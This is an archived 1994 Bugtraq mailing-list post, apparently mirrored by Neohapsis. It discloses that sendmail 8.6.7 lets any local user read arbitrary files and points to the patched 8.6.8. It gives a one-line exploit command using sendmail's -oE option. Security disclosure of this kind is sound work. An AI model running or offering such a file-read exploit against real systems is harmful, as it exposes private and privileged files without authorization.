Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1994_1

Bugtraq archives for 1st quarter (Jan-Mar) 1994: Exploit for sendmail8.6.7

Exploit for sendmail8.6.7

Michael Neuman (mcnnostromo.c3.lanl.gov)
Sat, 19 Mar 1994 08:14:14 -0700

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Evil Pete: "Re: anyone know details?"
Previous message: Bonfield James: "Re: sendmail -d hole"

  Sendmail 8.6.7 is vulnerable, and consequently 8.6.8 has been released.
It's available from ftp.cs.berkeley.edu:/ucb/sendmail/sendmail.8.6.8*

It's possible to read any file on the system with 8.6.7 from the command
line. Simply:

/usr/lib/sendmail -oEfilename_to_read bounce
From: your_username

Next message: Evil Pete: "Re: anyone know details?"
Previous message: Bonfield James: "Re: sendmail -d hole"